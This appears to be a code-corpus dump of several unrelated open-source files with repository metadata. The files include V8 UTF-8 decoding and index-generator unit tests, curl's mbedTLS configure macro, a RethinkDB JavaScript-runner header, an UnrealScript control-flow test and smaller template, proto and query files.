0xD0, 0xB6, 0xD0, 0xB7, 0xD0, 0xB8, 0xD0, 0xB9, 0xD0, 0xBA, 0xD0, 0xBB,
0xD0, 0xBC, 0xD0, 0xBD, 0xD0, 0xBE, 0xD0, 0xBF},
{0x400, 0x401, 0x402, 0x403, 0x404, 0x405, 0x406, 0x407, 0x408, 0x409,
0x40A, 0x40B, 0x40C, 0x40D, 0x40E, 0x40F, 0x410, 0x411, 0x412, 0x413,
0x414, 0x415, 0x416, 0x417, 0x418, 0x419, 0x41A, 0x41B, 0x41C, 0x41D,
0x41E, 0x41F, 0x420, 0x421, 0x422, 0x423, 0x424, 0x425, 0x426, 0x427,
0x428, 0x429, 0x42A, 0x42B, 0x42C, 0x42D, 0x42E, 0x42F, 0x430, 0x431,
0x432, 0x433, 0x434, 0x435, 0x436, 0x437, 0x438, 0x439, 0x43A, 0x43B,
0x43C, 0x43D, 0x43E, 0x43F}},
// Lonely first bytes:
// All 32 first bytes of 32-byte sequences, each followed by a space
// (generates 32 invalid char + space sequences.
{{0xC0, 0x20, 0xC1, 0x20, 0xC2, 0x20, 0xC3, 0x20, 0xC4, 0x20, 0xC5,
0x20, 0xC6, 0x20, 0xC7, 0x20, 0xC8, 0x20, 0xC9, 0x20, 0xCA, 0x20,
0xCB, 0x20, 0xCC, 0x20, 0xCD, 0x20, 0xCE, 0x20, 0xCF, 0x20, 0xD0,
0x20, 0xD1, 0x20, 0xD2, 0x20, 0xD3, 0x20, 0xD4, 0x20, 0xD5, 0x20,
0xD6, 0x20, 0xD7, 0x20, 0xD8, 0x20, 0xD9, 0x20, 0xDA, 0x20, 0xDB,
0x20, 0xDC, 0x20, 0xDD, 0x20, 0xDE, 0x20, 0xDF, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 16 first bytes of 3-byte sequences, each followed by a space
// (generates 16 invalid char + space sequences):
{{0xE0, 0x20, 0xE1, 0x20, 0xE2, 0x20, 0xE3, 0x20, 0xE4, 0x20, 0xE5,
0x20, 0xE6, 0x20, 0xE7, 0x20, 0xE8, 0x20, 0xE9, 0x20, 0xEA, 0x20,
0xEB, 0x20, 0xEC, 0x20, 0xED, 0x20, 0xEE, 0x20, 0xEF, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 8 first bytes of 4-byte sequences, each followed by a space
// (generates 8 invalid char + space sequences):
{{0xF0, 0x20, 0xF1, 0x20, 0xF2, 0x20, 0xF3, 0x20, 0xF4, 0x20, 0xF5, 0x20,
0xF6, 0x20, 0xF7, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 4 first bytes of 5-byte sequences (not supported), each followed by
// a space (generates 4 invalid char + space sequences):
{{0xF8, 0x20, 0xF9, 0x20, 0xFA, 0x20, 0xFB, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 2 first bytes of 6-byte sequences (not supported), each followed by
// a space (generates 2 invalid char + space sequences):
{{0xFC, 0x20, 0xFD, 0x20}, {0xFFFD, 0x20, 0xFFFD, 0x20}},
// Sequences with last continuation byte missing. Normally the whole
// incomplete sequence generates a single invalid character (exceptions
// explained below).
// 2-byte sequences with last byte missing
{{0xC0}, {0xFFFD}},
{{0xDF}, {0xFFFD}},
// 3-byte sequences with last byte missing.
{{0xE8, 0x80}, {0xFFFD}},
{{0xE0, 0xBF}, {0xFFFD}},
{{0xEF, 0xBF}, {0xFFFD}},
// Start of an overlong sequence. The first "maximal subpart" is the first
// byte; it creates an invalid character. Each following byte generates an
// invalid character too.
{{0xE0, 0x80}, {0xFFFD, 0xFFFD}},
// 4-byte sequences with last byte missing
{{0xF1, 0x80, 0x80}, {0xFFFD}},
{{0xF4, 0x8F, 0xBF}, {0xFFFD}},
// Start of an overlong sequence. The first "maximal subpart" is the first
// byte; it creates an invalid character. Each following byte generates an
// invalid character too.
{{0xF0, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequences (not supported) with last byte missing
{{0xF8, 0x80, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFB, 0xBF, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequences (not supported) with last byte missing
{{0xFC, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Concatenation of incomplete sequences: above incomplete sequences
// concatenated.
{{0xC0, 0xDF, 0xE8, 0x80, 0xE0, 0xBF, 0xEF, 0xBF, 0xE0, 0x80,
0xF1, 0x80, 0x80, 0xF4, 0x8F, 0xBF, 0xF0, 0x80, 0x80, 0xF8,
0x80, 0x80, 0x80, 0xFB, 0xBF, 0xBF, 0xBF, 0xFC, 0x80, 0x80,
0x80, 0x80, 0xFD, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Incomplete sequence tests repeated with a space after the incomplete
// sequence.
// 2-byte sequences with last byte missing
{{0xC0, 0x20}, {0xFFFD, 0x20}},
{{0xDF, 0x20}, {0xFFFD, 0x20}},
// 3-byte sequences with last byte missing
{{0xE8, 0x80, 0x20}, {0xFFFD, 0x20}},
{{0xE0, 0xBF, 0x20}, {0xFFFD, 0x20}},
{{0xEF, 0xBF, 0x20}, {0xFFFD, 0x20}},
// Start of overlong 3-byte sequence with last byte missing
{{0xE0, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0x20}},
// 4-byte sequences with last byte missing
{{0xF1, 0x80, 0x80, 0x20}, {0xFFFD, 0x20}},
{{0xF4, 0x8F, 0xBF, 0x20}, {0xFFFD, 0x20}},
// Start of overlong 4-byte sequence with last byte missing
{{0xF0, 0x80, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// 5-byte sequences (not supported) with last byte missing
{{0xF8, 0x80, 0x80, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
{{0xFB, 0xBF, 0xBF, 0xBF, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// 6-byte sequences (not supported) with last byte missing
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0x20},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF, 0x20},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// Impossible bytes
{{0xFE}, {0xFFFD}},
{{0xFF}, {0xFFFD}},
{{0xFE, 0xFE, 0xFF, 0xFF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Lead-byte-like bytes which aren't valid lead bytes.
{{0xC0}, {0xFFFD}},
{{0xC0, 0xAA}, {0xFFFD, 0xFFFD}},
{{0xC1}, {0xFFFD}},
{{0xC1, 0xAA}, {0xFFFD, 0xFFFD}},
{{0xF5}, {0xFFFD}},
{{0xF5, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF6}, {0xFFFD}},
{{0xF6, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF7}, {0xFFFD}},
{{0xF7, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF8}, {0xFFFD}},
{{0xF8, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF9}, {0xFFFD}},
{{0xF9, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFA}, {0xFFFD}},
{{0xFA, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFB}, {0xFFFD}},
{{0xFB, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFC}, {0xFFFD}},
{{0xFC, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFD}, {0xFFFD}},
{{0xFD, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFE}, {0xFFFD}},
{{0xFE, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFF}, {0xFFFD}},
{{0xFF, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Overlong sequences:
// Overlong encodings for "/"
{{0xC0, 0xAF}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x80, 0xAF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x80, 0x80, 0xAF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x80, 0x80, 0x80, 0xAF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0xAF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Maximum overlong sequences
{{0xC1, 0xBF}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x9F, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x8F, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x87, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x83, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Overlong encodings for 0
{{0xC0, 0x80}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x80, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Illegal code positions:
// Single UTF-16 surrogates
{{0xED, 0xA0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xA0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xB0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xBE, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
// Paired surrogates
{{0xED, 0xA0, 0x80, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xA0, 0x80, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Surrogates with the last byte missing.
{{0xED, 0xA0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xA0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAD}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAE}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAF}, {0xFFFD, 0xFFFD}},
{{0xED, 0xB0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xBE}, {0xFFFD, 0xFFFD}},
{{0xED, 0xBF}, {0xFFFD, 0xFFFD}},
// Other non-characters
{{0xEF, 0xBF, 0xBE}, {0xFFFE}},
{{0xEF, 0xBF, 0xBF}, {0xFFFF}},
{{0xEF, 0xB7, 0x90, 0xEF, 0xB7, 0x91, 0xEF, 0xB7, 0x92, 0xEF, 0xB7, 0x93,
0xEF, 0xB7, 0x94, 0xEF, 0xB7, 0x95, 0xEF, 0xB7, 0x96, 0xEF, 0xB7, 0x97,
0xEF, 0xB7, 0x98, 0xEF, 0xB7, 0x99, 0xEF, 0xB7, 0x9A, 0xEF, 0xB7, 0x9B,
0xEF, 0xB7, 0x9C, 0xEF, 0xB7, 0x9D, 0xEF, 0xB7, 0x9E, 0xEF, 0xB7, 0x9F,
0xEF, 0xB7, 0xA0, 0xEF, 0xB7, 0xA1, 0xEF, 0xB7, 0xA2, 0xEF, 0xB7, 0xA3,
0xEF, 0xB7, 0xA4, 0xEF, 0xB7, 0xA5, 0xEF, 0xB7, 0xA6, 0xEF, 0xB7, 0xA7,
0xEF, 0xB7, 0xA8, 0xEF, 0xB7, 0xA9, 0xEF, 0xB7, 0xAA, 0xEF, 0xB7, 0xAB,
0xEF, 0xB7, 0xAC, 0xEF, 0xB7, 0xAD, 0xEF, 0xB7, 0xAE, 0xEF, 0xB7, 0xAF},
{0xFDD0, 0xFDD1, 0xFDD2, 0xFDD3, 0xFDD4, 0xFDD5, 0xFDD6, 0xFDD7,
0xFDD8, 0xFDD9, 0xFDDA, 0xFDDB, 0xFDDC, 0xFDDD, 0xFDDE, 0xFDDF,
0xFDE0, 0xFDE1, 0xFDE2, 0xFDE3, 0xFDE4, 0xFDE5, 0xFDE6, 0xFDE7,
0xFDE8, 0xFDE9, 0xFDEA, 0xFDEB, 0xFDEC, 0xFDED, 0xFDEE, 0xFDEF}},
{{0xF0, 0x9F, 0xBF, 0xBE, 0xF0, 0x9F, 0xBF, 0xBF, 0xF0, 0xAF, 0xBF,
0xBE, 0xF0, 0xAF, 0xBF, 0xBF, 0xF0, 0xBF, 0xBF, 0xBE, 0xF0, 0xBF,
0xBF, 0xBF, 0xF1, 0x8F, 0xBF, 0xBE, 0xF1, 0x8F, 0xBF, 0xBF, 0xF1,
0x9F, 0xBF, 0xBE, 0xF1, 0x9F, 0xBF, 0xBF, 0xF1, 0xAF, 0xBF, 0xBE,
0xF1, 0xAF, 0xBF, 0xBF, 0xF1, 0xBF, 0xBF, 0xBE, 0xF1, 0xBF, 0xBF,
0xBF, 0xF2, 0x8F, 0xBF, 0xBE, 0xF2, 0x8F, 0xBF, 0xBF},
{0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE, 0x3FFFF, 0x4FFFE, 0x4FFFF,
0x5FFFE, 0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF}},
};
for (auto test : data) {
// For figuring out which test fails:
fprintf(stderr, "test: ");
for (auto b : test.bytes) {
fprintf(stderr, "%x ", b);
}
fprintf(stderr, "\n");
std::vector<unibrow::uchar> output_normal;
DecodeNormally(test.bytes, &output_normal);
CHECK_EQ(output_normal.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_normal.size(); ++i) {
CHECK_EQ(output_normal[i], test.unicode_expected[i]);
}
std::vector<unibrow::uchar> output_incremental;
DecodeIncrementally(test.bytes, &output_incremental);
CHECK_EQ(output_incremental.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_incremental.size(); ++i) {
CHECK_EQ(output_incremental[i], test.unicode_expected[i]);
}
std::vector<unibrow::uchar> output_utf16;
DecodeUtf16(test.bytes, &output_utf16);
CHECK_EQ(output_utf16.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_utf16.size(); ++i) {
CHECK_EQ(output_utf16[i], test.unicode_expected[i]);
}
}
}
} // namespace internal
} // namespace v8
| C++ | 5 | EXHades/v8 | test/unittests/strings/unicode-unittest.cc | [
"BSD-3-Clause"
] |
sub init()
print formatJSON({}) ' => {real: 'json'}
print http_get() ' => GET status: 200
print http_post() ' => POST status: 200
print isValid() ' => false
print shouldBeMocked() ' => "mocked correctly!"
end sub
| Brightscript | 2 | lkipke/brs | test/e2e/resources/components/mocks/components/partial/MockComponentPartial_NoMocks_Testbed.brs | [
"MIT"
] |
#***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 1998 - 2021, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://curl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
#***************************************************************************
dnl ----------------------------------------------------
dnl check for mbedTLS
dnl ----------------------------------------------------
AC_DEFUN([CURL_WITH_MBEDTLS], [
if test "x$OPT_MBEDTLS" != xno; then
_cppflags=$CPPFLAGS
_ldflags=$LDFLAGS
ssl_msg=
if test X"$OPT_MBEDTLS" != Xno; then
if test "$OPT_MBEDTLS" = "yes"; then
OPT_MBEDTLS=""
fi
if test -z "$OPT_MBEDTLS" ; then
dnl check for lib first without setting any new path
AC_CHECK_LIB(mbedtls, mbedtls_havege_init,
dnl libmbedtls found, set the variable
[
AC_DEFINE(USE_MBEDTLS, 1, [if mbedTLS is enabled])
AC_SUBST(USE_MBEDTLS, [1])
MBEDTLS_ENABLED=1
USE_MBEDTLS="yes"
ssl_msg="mbedTLS"
test mbedtls != "$DEFAULT_SSL_BACKEND" || VALID_DEFAULT_SSL_BACKEND=yes
], [], -lmbedx509 -lmbedcrypto)
fi
addld=""
addlib=""
addcflags=""
mbedtlslib=""
if test "x$USE_MBEDTLS" != "xyes"; then
dnl add the path and test again
addld=-L$OPT_MBEDTLS/lib$libsuff
addcflags=-I$OPT_MBEDTLS/include
mbedtlslib=$OPT_MBEDTLS/lib$libsuff
LDFLAGS="$LDFLAGS $addld"
if test "$addcflags" != "-I/usr/include"; then
CPPFLAGS="$CPPFLAGS $addcflags"
fi
AC_CHECK_LIB(mbedtls, mbedtls_ssl_init,
[
AC_DEFINE(USE_MBEDTLS, 1, [if mbedTLS is enabled])
AC_SUBST(USE_MBEDTLS, [1])
MBEDTLS_ENABLED=1
USE_MBEDTLS="yes"
ssl_msg="mbedTLS"
test mbedtls != "$DEFAULT_SSL_BACKEND" || VALID_DEFAULT_SSL_BACKEND=yes
],
[
CPPFLAGS=$_cppflags
LDFLAGS=$_ldflags
], -lmbedx509 -lmbedcrypto)
fi
if test "x$USE_MBEDTLS" = "xyes"; then
AC_MSG_NOTICE([detected mbedTLS])
check_for_ca_bundle=1
LIBS="-lmbedtls -lmbedx509 -lmbedcrypto $LIBS"
if test -n "$mbedtlslib"; then
dnl when shared libs were found in a path that the run-time
dnl linker doesn't search through, we need to add it to
dnl CURL_LIBRARY_PATH to prevent further configure tests to fail
dnl due to this
if test "x$cross_compiling" != "xyes"; then
CURL_LIBRARY_PATH="$CURL_LIBRARY_PATH:$mbedtlslib"
export CURL_LIBRARY_PATH
AC_MSG_NOTICE([Added $mbedtlslib to CURL_LIBRARY_PATH])
fi
fi
fi
fi dnl mbedTLS not disabled
test -z "$ssl_msg" || ssl_backends="${ssl_backends:+$ssl_backends, }$ssl_msg"
fi
])
| M4 | 4 | Greg-Muchka/curl | m4/curl-mbedtls.m4 | [
"curl"
] |
// Copyright 2020 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/heap/index-generator.h"
#include "test/unittests/test-utils.h"
namespace v8 {
namespace internal {
TEST(IndexGeneratorTest, Empty) {
IndexGenerator gen(0);
EXPECT_EQ(base::nullopt, gen.GetNext());
}
TEST(IndexGeneratorTest, GetNext) {
IndexGenerator gen(11);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(5U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(8U, gen.GetNext());
EXPECT_EQ(1U, gen.GetNext());
EXPECT_EQ(3U, gen.GetNext());
EXPECT_EQ(6U, gen.GetNext());
EXPECT_EQ(9U, gen.GetNext());
EXPECT_EQ(4U, gen.GetNext());
EXPECT_EQ(7U, gen.GetNext());
EXPECT_EQ(10U, gen.GetNext());
EXPECT_EQ(base::nullopt, gen.GetNext());
}
TEST(IndexGeneratorTest, GiveBack) {
IndexGenerator gen(4);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(1U, gen.GetNext());
gen.GiveBack(2);
gen.GiveBack(0);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(3U, gen.GetNext());
EXPECT_EQ(base::nullopt, gen.GetNext());
}
} // namespace internal
} // namespace v8
| C++ | 4 | EXHades/v8 | test/unittests/heap/index-generator-unittest.cc | [
"BSD-3-Clause"
] |
prefix=@PROJECT_SPACE_DIR
Name: @(CATKIN_PACKAGE_PREFIX + PROJECT_NAME)
Description: Description of @PROJECT_NAME
Version: @PROJECT_VERSION
Cflags: @(' '.join(['-I%s' % include for include in PROJECT_PKG_CONFIG_INCLUDE_DIRS]))
Libs: -L${prefix}/lib @(' '.join(PKG_CONFIG_LIBRARIES_WITH_PREFIX))
Requires: @(PROJECT_CATKIN_DEPENDS)
| EmberScript | 3 | nnsuite/tizenport-ros-catkin | cmake/em/pkg.pc.em | [
"BSD-3-Clause"
] |
syntax = "proto3";
package proto_example.common.items;
enum ItemType {
DEFAULT = 0;
SUPERIOR = 1;
FLAWLESS = 2;
} | Protocol Buffer | 4 | SuperHuangXu/nest | integration/microservices/src/grpc-advanced/proto/common/item_types.proto | [
"MIT"
] |
let $nodeKey := sdb:nodekey(.=>foo[[2]])
let $xml :=
<xml>
<bar>
<hello>world</hello>
<helloo>true</helloo>
</bar>
<baz>hello</baz>
<foo>
<element>bar</element>
<element null="true"/>
<element>2.33</element>
</foo>
<tada>
<element>
<foo>bar</foo>
</element>
<element>
<baz>false</baz>
</element>
<element>boo</element>
<element/>
<element/>
</tada>
</xml>
return {"nodeKey": $nodeKey}
| XQuery | 3 | JohannesLichtenberger/sirix | bundles/sirix-kotlin-cli/src/test/resources/org/sirix/cli/commands/test.xq | [
"BSD-3-Clause"
] |
class Labels extends Object;
// We use the assert statement, i.e. "assert (condition);" here as a code filler.
function TestSwitchNesting()
{
switch (true)
{
case true:
case false:
case true:
break;
case false:
break;
default:
break;
}
}
/**
* Test jump nesting case where a switch with a default case is missing a close of its outer nest.
*/
function TestIfAndSwitchWithDefaultNesting()
{
if (true) // We are testing for this nesting block.
{
if (true)
{
switch (true)
{
case true:
assert (true);
default:
assert (true);
}
}
}
if (true)
{
return;
}
}
function TestIfAndSwitchWithEmptyNesting()
{
if (true)
{
if (true)
{
switch (true)
{
// FIXME: With empty rules, we run into decompile issues
case true:
default:
}
}
}
if (true)
{
return;
}
}
// Issue: The if is closed with along with a nesting block.
function TestSwitchAndCaseWithIfNesting()
{
switch (true)
{
case true:
if (true)
{
assert (true);
break;
}
default:
return;
}
}
function TestSwitchAndCaseWithLabels()
{
switch (true)
{
case true:
if (true)
{
assert (true);
goto Case2;
}
break;
case false:
if (true)
{
assert (true);
break;
}
Case2:
default:
assert (true);
}
}
function TestForAndIfWithElse()
{
local int i;
for (i = 0; i < 0xFF; i++)
{
if (true)
{
if (false)
{
assert (true);
}
else
{
assert (true);
if (false)
{
assert (true);
continue;
}
}
}
assert (true);
}
assert (true);
}
function TestIfWithGoto()
{
if (true)
{
assert (true);
if (true)
{
assert (true);
if (true)
{
assert (true);
goto NextLabel;
}
}
}
NextLabel:
if (false)
{
}
else
{
assert (true);
if (false)
{
assert (true);
}
else
{
assert (false);
}
}
}
function TestIfAndWhileLoopLabel()
{
if (false)
{
}
else
{
}
// We expect a loop label here.
while (true)
{
}
}
function TestForLoop()
{
local int i;
for (i = 0; i < 0xFF; ++i)
{
assert (false);
}
}
function TestWhileLoop()
{
while (true)
{
assert (false);
}
}
function TestDoUntilLoop()
{
do
{
assert (true);
} until (true);
} | UnrealScript | 2 | LaudateCorpus1/Unreal-Library | Test/upk/TestUC2/Classes/Labels.uc | [
"MIT"
] |
// Copyright 2010-2013 RethinkDB, all rights reserved.
#ifndef EXTPROC_JS_RUNNER_HPP_
#define EXTPROC_JS_RUNNER_HPP_
#include <string>
#include <vector>
#include <set>
#include "errors.hpp"
#include <boost/variant.hpp>
#include "containers/scoped.hpp"
#include "containers/counted.hpp"
#include "rdb_protocol/datum.hpp"
#include "concurrency/wait_any.hpp"
#include "arch/timing.hpp"
#include "extproc/extproc_job.hpp"
// Unique ids used to refer to objects on the JS side.
typedef uint64_t js_id_t;
const js_id_t INVALID_ID = 0;
// JS calls result either in a DATUM return value, a function id (which we can
// use to call the function later), or an error string
typedef boost::variant<ql::datum_t, js_id_t, std::string> js_result_t;
class extproc_pool_t;
class js_runner_t;
class js_job_t;
class js_timeout_sentry_t;
// A handle to a running "javascript evaluator" job.
class js_runner_t : public home_thread_mixin_t {
public:
js_runner_t();
~js_runner_t();
bool connected() const;
// Used for worker configuration
struct req_config_t {
uint64_t timeout_ms;
};
void begin(extproc_pool_t *pool,
signal_t *interruptor,
const ql::configured_limits_t &limits);
void end();
// Evalute JS source string to either a value or a function ID to call later
js_result_t eval(const std::string &source,
const req_config_t &config);
// Calls a previously compiled function.
js_result_t call(const std::string &source,
const std::vector<ql::datum_t> &args,
const req_config_t &config);
private:
static const size_t CACHE_SIZE;
void cache_id(js_id_t id, const std::string &source);
void trim_cache();
// Invalidates an ID, dereferencing the object it refers to in the
// javascript evaluator process.
void release_id(js_id_t id);
class job_data_t;
scoped_ptr_t<job_data_t> job_data;
DISABLE_COPYING(js_runner_t);
};
#endif /* EXTPROC_JS_RUNNER_HPP_ */
| C++ | 4 | zadcha/rethinkdb | src/extproc/js_runner.hpp | [
"Apache-2.0"
] |
#!/usr/bin/env bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
